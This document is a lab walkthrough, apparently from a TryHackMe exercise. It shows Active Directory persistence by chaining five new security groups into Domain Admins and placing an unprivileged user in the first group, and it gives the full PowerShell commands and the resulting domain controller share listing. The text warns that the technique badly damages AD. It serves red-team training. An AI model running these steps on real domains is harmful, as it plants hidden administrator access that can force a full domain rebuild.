Persistence through group membership


A quick note here. These techniques are incredibly invasive and hard to remove. Even if you have sign-off on your red team exercise to perform these techniques, you must take the utmost caution when performing these techniques. In real-world scenarios, the exploitation of most of these techniques would result in a full domain rebuild. Make sure you fully understand the consequences of using these techniques and only perform them if you have prior approval on your assessment, and they are deemed necessary. In most cases, a red team exercise would be dechained at this point instead of using these techniques. Meaning you would most likely not perform these persistence techniques but rather simulate them.

The most privileged groups or resources are not always the best choice, as they are often more closely watched for changes by the blue team. Exploiting permission delegation gave privileges to reset user passwords, which would be good for maintaining access to workstations.

A local administrator group may be less monitored than a global administrator groups, and a group nested in a privileged group may be the access needed.



Create groups

Launch PowerShell

powershell -ep bypass

Create group in the People\IT OU:

New-ADGroup -Path "OU=IT,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "THM Nest Group 1" -SamAccountName "THM_nestgroup1" -DisplayName "THM Nest Group 1" -GroupScope Global -GroupCategory Security

Create group in the People\Sales OU:

New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "THM Nest Group 2" -SamAccountName "THM_nestgroup2" -DisplayName "THM Nest Group 2" -GroupScope Global -GroupCategory Security

Create group in the People\Consulting OU:

New-ADGroup -Path "OU=CONSULTING,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "THM Nest Group 3" -SamAccountName "THM_nestgroup3" -DisplayName "THM Nest Group 3" -GroupScope Global -GroupCategory Security

Create group in the People\Marketing OU:

New-ADGroup -Path "OU=MARKETING,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "THM Nest Group 4" -SamAccountName "THM_nestgroup4" -DisplayName "THM Nest Group 4" -GroupScope Global -GroupCategory Security

Create group in the People\IT OU:

New-ADGroup -Path "OU=IT,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "THM Nest Group 5" -SamAccountName "THM_nestgroup5" -DisplayName "THM Nest Group 5" -GroupScope Global -GroupCategory Security


Add Group 1 to Group 2

Add-ADGroupMember -Identity 'THM_nestgroup2' -Members 'THM_nestgroup1'

Add Group 2 to Group 3

Add-ADGroupMember -Identity 'THM_nestgroup3' -Members 'THM_nestgroup2'

Add Group 3 to Group 4

Add-ADGroupMember -Identity 'THM_nestgroup4' -Members 'THM_nestgroup3'

Add Group 4 to Group 5

Add-ADGroupMember -Identity 'THM_nestgroup5' -Members 'THM_nestgroup4'

Add Group 5 to Domain Admins

Add-ADGroupMember -Identity 'Domain Admins' -Members 'THM_nestgroup5'

Add unprivileged user to Group 1

Add-ADGroupMember -Identity 'THM_nestgroup1' -Members ''

Verify inherited privileges

SSH to thmwrk1 as the unprivileged user.


Try accessing a privileged resource on the domain controller:

dir \\\c$\Users

 Volume in drive \\\c$ is Windows 
 Volume Serial Number is 1634-22A9

 Directory of \\\c$

01/04/2022  08:47 AM               103 delete-vagrant-user.ps1     
05/01/2022  09:11 AM               169 dns_entries.csv
09/15/2018  08:19 AM    <DIR>          PerfLogs
05/11/2022  10:32 AM    <DIR>          Program Files
03/21/2020  09:28 PM    <DIR>          Program Files (x86)
05/01/2022  09:17 AM             1,725 thm-network-setup-dc.ps1    
04/25/2022  07:13 PM    <DIR>          tmp
05/15/2022  09:16 PM    <DIR>          Tools
04/27/2022  08:22 AM    <DIR>          Users
04/25/2022  07:11 PM    <SYMLINKD>     vagrant [\\vboxsvr\vagrant] 
04/27/2022  08:12 PM    <DIR>          Windows
               3 File(s)          1,997 bytes
               8 Dir(s)  51,573,755,904 bytes free

If this was a real organisation, we would not be creating new groups to nest. Instead, we would make use of the existing groups to perform nesting. This is something you would never do on a normal red team assessment and almost always dechain at this point since it breaks the organisation’s AD structure, and if we sufficiently break it, they would not be able to recover. At this point, even if the blue team was able to kick us out, the organisation would more than likely still have to rebuild their entire AD structure from scratch, resulting in significant damages.